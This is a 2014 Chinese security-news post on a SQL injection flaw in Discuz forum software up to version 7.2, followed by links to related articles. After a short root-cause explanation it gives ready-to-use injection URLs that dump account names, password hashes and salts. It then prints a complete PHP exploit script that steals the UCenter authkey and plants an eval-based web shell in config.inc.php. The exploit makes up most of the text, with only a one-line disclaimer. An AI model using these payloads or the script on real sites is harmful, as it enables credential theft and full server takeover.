Discuz <= 7.2 SQL注入漏洞详情

标签: 漏洞 | 发表时间:2014-07-04 20:55 | 作者:千秋丶千年
出处:http://www.freebuf.com

据说是某数字公司的应急给发布出来了.群里面的小伙伴都惊呆了,具体的漏洞分析看 此文

其中的

在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有
提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体
现,如下面的代码片段:
 
// foo.php?xigr=&#039;ryat
function daddslashes($string, $force = 0) {
!defined(&#039;MAGIC_QUOTES_GPC&#039;) && define(&#039;MAGIC_QUOTES_GPC&#039;, get_magic_quotes_gpc());
if(!MAGIC_QUOTES_GPC || $force) {
if(is_array($string)) {
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
} else {
$string = addslashes($string);
}
}
return $string;
}
...
foreach(array(&#039;_COOKIE&#039;, &#039;_POST&#039;, &#039;_GET&#039;) as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != &#039;_&#039; && $$_key = daddslashes($_value);
}
}
 
echo $xigr[&#039;hi&#039;];
// echo \
 
上面的代码原本期望得到一个经过daddslashes()安全处理后的数组变量$xigr[&#039;hi&#039;],但是没
有对变量$xigr做严格的类型规定,当我们提交一个字符串变量$xigr=&#039;ryat,经过上面的处理
变为\&#039;ryat,到最后$xigr[&#039;hi&#039;]就会输出\,如果这个变量引入到SQL语句,那么就会引起严重
的安全问题了,再来看下面的代码片段:
 
...
if($xigr) {
foreach($xigr as $k => $v) {
$uids[] = $v[&#039;uid&#039;];
}
$query = $db->query("SELECT uid FROM users WHERE uid IN (&#039;".implode("&#039;,&#039;", $uids)."&#039;)");
 
利用上面提到的思路,通过提交foo.php?xigr[]=&#039;&xigr[][uid]=evilcode这样的构造形式可
以很容易的突破GPC或类似的安全处理,形成SQL注射漏洞:D

测试漏洞存在的语句 

  http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

爆出账号+密码+salt的语句

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


以下内容仅供站长进行安全自检,非法利用责任自负

附上getshell exp:(根据别人的测试,代码可能有些部分有待完善)

<?php
 
/**
* @author: xiaoma
* @blog  : www.i0day.com
* @date  : 2014.7.2 23:1
*/
 
error_reporting(0);
set_time_limit(3000);
$host=$argv[1];
$path=$argv[2];
$js=$argv[3];
$timestamp = time()+10*3600;
$table="cdb_";//表名
 
if ($argc < 2) {
print_r(&#039;
********************************************************
*  Discuz faq.php SQL Injection Exp                    *
*  ---------By:Www.i0day.com-----------               *
*     Usage: php &#039;.$argv[0].&#039; url [js]                    *
*  -------------------------------------               *
*  js选项: 1.GetShell 2.取密码 3.查表前缀              *
*                                                      *
*   php &#039;.$argv[0].&#039; Www.i0day.com / 1                    *
*   php &#039;.$argv[0].&#039; Www.i0day.com /dz72/ 1               *
*                                                      *
*                                                      *
********************************************************
&#039;);
exit;
}
if($js==1){
$sql="action=grouppermission&gids[99]=&#039;&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
$resp = sendpack($host,$path,$sql);
 
if(strpos($resp,"::")==-1){
echo &#039;表前缀可能不是默认cdb_ 请先查看表前缀!&#039;;
}else{
preg_match("/::(.*)::/",$resp,$matches);
$lenght=intval($matches[1]);
if($lenght){
if($lenght<=124){
$sql="action=grouppermission&gids[99]=&#039;&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
$resp = sendpack($host,$path,$sql);
if(strpos($resp,"1\^")!=-1){
preg_match("/1\^(.*)\&#039;/U",$resp,$key1);
$sql="action=grouppermission&gids[99]=&#039;&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
$resp = sendpack($host,$path,$sql);
preg_match("/1\^(.*)\&#039;/U",$resp,$key2);
$key=$key1[1].$key2[1];
$code=urlencode(_authcode("time=$timestamp&action=updateapps", &#039;ENCODE&#039;, $key));
$cmd1=&#039;<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com\&#039;);eval($_POST[i0day]);//</item>
</root>&#039;;
$cmd2=&#039;<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com</item>
</root>&#039;;
$html1 = send($cmd1);
$res1=substr($html1,-1);
$html2 = send($cmd2);
$res2=substr($html1,-1);
if($res1==&#039;1&#039;&&$res2==&#039;1&#039;){
echo "shell地址:http://".$host.$path.&#039;config.inc.php   pass:i0day&#039;;
}
}else{
echo &#039;获取失败&#039;;
}
}
}
}
 
}elseif($js==2){
$sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";
$resp = sendpack($host,$path,$sql);
if(strpos($resp,"\^\^\^")!=-1){
preg_match("/\^\^\^(.*)\^/U",$resp,$password);
echo &#039;密码:&#039;.$password[1];
}else{
echo &#039;表前缀可能不是默认cdb_ 请先查看表前缀!&#039;;
}
}elseif($js==3){
$sql="action=grouppermission&gids[99]=&#039;&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";
$resp = sendpack($host,$path,$sql);
if(strpos($resp,"1\^")!=-1){
preg_match("/1\^(.*)\^/U",$resp,$t);
 
if(strpos($t[1],"cdb_")!=-1){
echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改";
}else{
echo "表名:".hex2str($t[1]).&#039; 不是默认表名cdb_请自行修改代码中的$table&#039;;
}
}else{
echo "查看表前缀失败,Sorry";
}
}else{
echo "未选择脚本功能";
}
 
 
function sendpack($host,$path,$sql,$js){
$data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";
$data.="Host:".$host."\r\n";
$data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";
$data.="Connection: close\r\n\r\n";
//$data.=$html."\r\n";
$ock=fsockopen($host,80);
 
if(!$ock){
echo "No response from ".$host;
die();
 
}
fwrite($ock,$data);
 
$resp = &#039;&#039;;
 
while (!feof($ock)) {
 
$resp.=fread($ock, 1024);
}
 
return $resp;
 
}
function send($cmd){
global $host,$code,$path;
$message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: ".$host."\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$host."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
 
//var_dump($message);
$fp = fsockopen($host, 80);
fputs($fp, $message);
 
$resp = &#039;&#039;;
 
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
 
return $resp;
}
 
function _authcode($string, $operation = &#039;DECODE&#039;, $key = &#039;&#039;, $expiry = 0) {
$ckey_length = 4;
 
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == &#039;DECODE&#039; ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : &#039;&#039;;
 
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
 
$string = $operation == &#039;DECODE&#039; ? base64_decode(substr($string, $ckey_length)) : sprintf(&#039;%010d&#039;, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
 
$result = &#039;&#039;;
$box = range(0, 255);
 
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
 
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
 
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
 
if($operation == &#039;DECODE&#039;) {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return &#039;&#039;;
}
} else {
return $keyc.str_replace(&#039;=&#039;, &#039;&#039;, base64_encode($result));
}
 
}
function hex2str($hex){
$str = &#039;&#039;;
$arr = str_split($hex, 2);
foreach($arr as $bit){
$str .= chr(hexdec($bit));
}
return $str;
}
?>

[ 原文链接]

相关 [discuz sql 漏洞] 推荐:

Discuz <= 7.2 SQL注入漏洞详情

- - FreeBuf.COM
据说是某数字公司的应急给发布出来了.群里面的小伙伴都惊呆了,具体的漏洞分析看 此文. 爆出账号+密码+salt的语句. 以下内容仅供站长进行安全自检,非法利用责任自负. 附上getshell exp:(根据别人的测试,代码可能有些部分有待完善).

Discuz 7.2坑爹集锦-SQL篇

- - ITeye博客
Discuz 7.2坑爹集锦-SQL篇. DZ使用的是MySQL的MyISAM引擎,特点是简单快速,非常适合网络扁平数据. 当数据量超过一定规模(大概300万),数据关联复杂(表连接增多)后性能急剧下降. 并且在高读写并发时锁表严重(MyISAM是表锁,InnoDB有行锁),甚至导致表损坏. DZ7.2代码中SQL写法存在不标准的问题,虽然不影响执行但对维护迁移是个问题.

从雅虎频繁曝出SQL漏洞看SQL注入威胁

- - FreeBuf.COM
雅虎贡献者网站(http://contributor.yahoo.com/)最近再次曝出存在SQL注入漏洞. 漏洞于几个月之前被提交,雅虎修复之后便以知名度下降为理由关闭了贡献者网站. 漏洞是由安全研究员Behrouz Sadeghipour发现的. 通过盲注,Behrouz发现了雅虎贡献者网站存在一个SQL漏洞,该漏洞可能会使黑客利用来窃取用户和作者的个人信息.

流行WordPress SEO插件曝高危SQL注入漏洞

- - FreeBuf.COM | 关注黑客与极客
最新消息,全球最流行的CMS应用WordPress插件WordPress SEO by Yoast曝高危SQL注入漏洞,该插件使用频率相当高,用户高达可达千万. WordPress SEO by Yoast插件是WordPress平台下非常流行的SEO插件,看其在Yoast网站上高达1400万次的下载量就知道了.

WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案 - 牛奶、不加糖

- - 博客园_首页
一、跨站脚本攻击(XSS). XSS又叫CSS (Cross Site Script) ,跨站脚本攻击. 它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的. XSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些js脚本,这时,攻击行为才真正生效.

PHP代码网站防范SQL注入漏洞攻击的建议

- - BlogJava-qileilove
 所有的网站管理员都会关心网站的安全问题. SQL注入攻击(SQL Injection). 黑客通过SQL注入攻击可以拿到网站. 数据库的访问权限,之后他们就可以拿到网站数据库中所有的数据,恶意的黑客可以通过SQL注入功能篡改数据库中的数据甚至会把数据库中的数据毁坏掉. 做为网络开发者的你对这种黑客行为恨之入骨,当然也有必要了解一下SQL注入这种功能方式的原理并学会如何通过代码来保护自己的网站数据库.

Sqlmap联合Nginx实现“地毯式”检测网站SQL注入漏洞

- - FreeBuf.COM | 关注黑客与极客
以安全防御方的角度来看,防御的广度比深度更具优先级,这也是信息安全中木桶原理的体现. Sqlmap是一个开源的SQL注入漏洞检测工具,Nginx是高性能的WEB服务器. 今天我们将二者结合起来,对网站的SQL注入漏洞实现“地毯式”的检测. sqlmap可以批量导入http代理的日志,根据日志中的每一个请求进行分析和探测.

MySQL优化 之 Discuz论坛MySQL通用优化

- - MySQL 中文网 -
之前分别在2006和2009年写过两篇关于discuz优化的文章: MySQL优化 之 Discuz论坛优化、 MySQL优化 之 Discuz论坛优化 -- 续,没想到都6年过去了,discuz还在坚挺的使用MyISAM引擎,堪比罚改委. 今日帮朋友优化号称日均500PV,100UV的论坛,后台DB采用R710(16G Ram,PERC 6/i 256MB BBU,4块 15K RPM SAS盘做raid 1+0,ext3文件系统,E5620 * 2),这个配置看似也不错了,不过压力仍然较大,大量的请求处于:sending data和statistics状态.

PL/SQL动态SQL(原创)

- - ITeye博客
使用动态SQL是在编写PL/SQL过程时经常使用的方法之一. 很多情况下,比如根据业务的需要,如果输入不同查询条件,则生成不同的执行SQL查询语句,对于这种情况需要使用动态SQL来完成. 再比如,对于分页的情况,对于不同的表,必定存在不同的字段,因此使用静态SQL则只能针对某几个特定的表来形成分页.

Derby SQL 分页

- - ITeye博客
    之前在网上看到有人问 Derby SQL 分页实现的问题,网上有人给出这样的解决方案,SQL 如下:. 其实,这样的分页查询,性能不理想,我试过在 300W 数据量中采用这种分页方式,需要 20~30秒之久;其实 Derby 10.6 以上版本有更好的分页支持,直接给出 SQL 实现如下:.